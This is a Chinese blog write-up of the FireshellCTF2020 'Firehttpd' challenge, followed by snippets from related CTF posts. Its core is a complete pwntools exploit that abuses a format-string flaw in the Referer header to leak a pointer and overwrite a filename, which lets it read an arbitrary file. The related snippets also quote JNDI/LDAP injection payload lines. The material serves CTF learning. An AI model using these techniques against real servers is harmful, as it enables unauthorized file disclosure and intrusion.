[FireshellCTF2020]Firehttpd

最新推荐文章于 2024-05-13 09:50:50 发布
最新推荐文章于 2024-05-13 09:50:50 发布
阅读量531 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107568078
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

[FireshellCTF2020]Firehttpd

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在referer字段的解析里存在格式化字符串漏洞,由于是主进程fork子进程,因此,我们泄露的数据第二次不会改变仍然可以使用。

那么,我们利用格式化字符串漏洞,将文件名指针修改指向我们可控的地址,这样就可以读取我们想要的文件了。

#coding:utf8
from pwn import *

ip = 'node3.buuoj.cn'
port = 28726
sh = remote(ip,port)

#泄露文件名的地址
payload = 'GET /index.html HTTP/1.1\r\n'
payload += 'Referer: %5$p\r\n\r\n'
sh.send(payload)
sh.recvuntil('Referer: ')
name_addr = int(sh.recvuntil('\n',drop = True),16)
print 'name_addr=',hex(name_addr)
sh.close()

sh = remote(ip,port)
#修改文件名指针指向我们可控的地方
flag_str = name_addr - 0xA98
data = {0:0}
i = 0
flag_str = flag_str & 0xFFFF
while flag_str >0:
   data[i] = flag_str & 0xFF
   flag_str = flag_str >> 8
   i = i + 1
data = sorted(data.items(), key=lambda d:d[1])
pay = ''
prev = 9
for x in data:
   print x[0],x[1]
   pay += '%' + str(x[1]-prev) + 'c%' + str(18+x[0]) + '$hhn'
   prev = x[1]
pay = pay.ljust(47,'b')
pay += p64(name_addr - 0xB10)
pay += p64(name_addr - 0xB0F)
pay += 'flag\x00' #我们要读取的文件

payload = 'GET /index.html HTTP/1.1\r\n'
payload += 'Referer: {}\r\n\r\n'.format(pay)
sh.send(payload)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[FireshellCTF2020]Caas
qaq517384的博客
10-22 417
打开环境是一个代码运行界面 直接输入一个cat /flag,显示报错 可以看到文件名/tmp/caas_6l09k25y.c(每次都不同),以及我们输入的代码 编译一个hello word #include <stdio.h> int main() { printf("Hello, World! \n"); } 会弹出一个下载文件 运行也能正确输出 写了个读flag的脚本,后来发现,载下来的本地脚本跟环境的flag没有一点关系,淦 回到开始的报错 多打了一个字导致报错:找不到文件
前端样板和工作流FireShell.zip
07-18
FireShell 是一个比较轻率的框架,基于 HTML5, Grunt, Sass.为现代开发者而诞生. 对于团队和个人来说, 真是一个棒的开发流程管理工具. JavaScript可以运行,生成处理,自动压缩和文件关联, 用高级的HTML5来武装自己,使得它成为一个很牛X的框架. 它引用了部分HTML5,还有HTML5相关的一些原理,WAI-ARIA基线标记和实用的web. 适合小项目的css结构和定标器,独特的架构方式能缩小你写的对象形的css代码 . 还有很多灵活性比较强的文件夹结构层. 标签:FireShell  Web框架
[FireshellCTF2020]Caas
cjdgg的博客
07-04 521
题目一进去如下所示 他要求我们输入代码然后其帮我们编译 emem试了下<?php phpinfo(); ?> 看到这报错,说实话,我也不知道报的是啥错平时一般用的php和python较多,但按照Sorry, we could not compile this code.,这意思百分之百不是php,那就上网搜一些别的语音的代码 #include <stdio.h> int main() { printf("Hello, World! \n"); return 0
[FireshellCTF2020]ScreenShooter
Sk1y的博客
01-22 4140
知识点:CVE-2019-17221,任意文件读取
[BUUCTF][FireshellCTF2020]URL TO PDF
Y4tacker的博客
10-22 3322
前言:我想提起最强的剑! 文章目录考点WP部分 啊这,这道题我不知道是啥,跟着别人的wp做吧 考点 SSRF WP部分 首先题目是个提交框,可以提交一个 url 服务器会访问并转成 pdf 以供下载 试一下file协议??? 提示invalid url,完全不知道干嘛抓包试一试,然后啥都没有,看了下wp,然后我一开始以为是内网环境,结果是直接访问公网憨批了 是很不常见的 WeasyPrint,根据上面的考点,这个爬虫虽然不会渲染 js,但是却可以解析 <link attachment=xxx&g
[FireshellCTF2020]URL TO PDF
Sk1y的博客
01-23 1271
[FireshellCTF2020]URL TO PDF 这个题目的前端和[FireshellCTF2020]ScreenShooter好相似,填写一个url,会返回一个pdf,上个题目是返回的图片 这东西应该也是和爬虫相关的,让靶机去访问vps的7777端口,监听查看请求 发现是WeasyPrint WeasyPrint WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件 引用文章:我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF)
推荐一款高效前端开发框架——FireShell
最新发布
gitblog_00064的博客
05-13 450
推荐一款高效前端开发框架——FireShell 项目地址:https://gitcode.com/toddmotto/fireshell 项目介绍 欢迎来到FireShell的世界!这是一个专门为现代开发者设计的前端快速启动模板和工作流程框架。无论你是团队的一员还是独立开发者,FireShell都能帮你构建更高效的工作流程。它集成了JavaScript任务运行、构建过程、自动化压缩和文件合并,并以...
Fireshell的使用说明
糯米糊糊的专栏
11-11 2666
今天花了半天时间, 研究了一下网上的一个叫做Fireshell的前端项目, 这个项目地址是:
NSSCTF实战:Apache HTTPD 多后缀解析漏洞
weixin_52270928的博客
05-17 565
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。
BUUCTF--[FireshellCTF2020]Caas
qq_46263951的博客
07-28 263
考点: #include ''预处理编译报错 文件包含 使用 # include "/flag" ,使flag可以在错误提示中出现
BUUCTF--[FireshellCTF2020]ScreenShooter
qq_46263951的博客
08-26 594
进入页面后首先是让我们输入一个网址,当我们访问百度网址时它会返回百度网页的截图 看大佬的wp上是说这里存在的是CVE-2019-17221漏洞 PhantomJS 到 2.1.1 有一个任意文件读取漏洞,如 file:// URI 的 XMLHttpRequest 所示。该漏洞存在于网页模块的 page.open() 函数中,该函数加载指定的 URL 并调用给定的回调。攻击者可以提供特制的 HTML 文件作为用户输入,允许读取文件系统上的任意文件。例如,如果 page.render() ...
BUUCTF [FireshellCTF2020] Caas
Senimo
01-11 752
BUUCTF [FireshellCTF2020] Caas 考点: #include ''预处理编译报错 启动环境: 提示是一个代码编译功能,尝试输入<?php echo 'Hello'; ?>,得到了报错: 根据报错发现是C语言编译器,输入: #include <stdio.h> int main() { printf("Hello, World! \n"); return 0; } 编译后下载了一个文件: 开始以为和这个文件有关,但是后续尝试中发
buu-day08
anwen12的博客
01-05 587
又是早起刷题的一天 0x01 [FBCTF2019]Products Manager sql约束注入 在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断 mysql字符串比较 mysql == `mysql空格空格空格空格空格空格空格空格空格空格 可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。 插入 name: facebook .
buu-day10
anwen12的博客
01-27 2202
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
BUU刷题记录——7
weixin_43610673的博客
02-20 3639
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
FireShell CTF 2019小记
郁离歌丶的博客
03-20 1007
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
NSSCTF Round#20 Basic 真亦假,假亦真 CSDN_To_PDF V1.2 出题笔记 (附wp+源码)
Jay17的博客
03-30 1798
NSSCTF Round#20 Basic 真亦假,假亦真 CSDN_To_PDF V1.2 出题笔记 (附wp+源码)
cc链1分析
Sk1y的博客
04-08 749
cc链1分析 文章目录cc链1分析jdk版本依赖测试弹计算器用反射去调用Runtime,去弹一个计算器倒序找链危险函数InvokerTransformer-->transformerTransformedMapMapEntry入口AnnotationInvocationHandlerRuntime序列化ChainedTransformer类对其简化继续调试 jdk版本 jdk版本:jdk8u65 因为在jdk8u71的时候,已经修复了 下载相应的jdk版本,去下面这个链接 https://www.or
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值